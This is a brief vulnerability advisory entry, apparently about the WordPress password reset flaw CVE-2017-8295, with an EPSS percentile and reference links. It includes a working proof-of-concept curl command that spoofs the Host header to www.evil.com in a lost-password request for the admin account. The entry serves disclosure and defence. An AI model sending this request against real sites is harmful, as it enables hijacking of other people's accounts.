EPSS
Percentile
90.4%
Attacker may be able to set the ‘From’ email header in password reset emails.
curl -H “Host: www.evil.com” --data “user_login=admin&redirect;_to=&wp-submit;=Get+New+Password” http://example.com/wp-login.php?action=lostpassword
blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
core.trac.wordpress.org/ticket/25239
exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html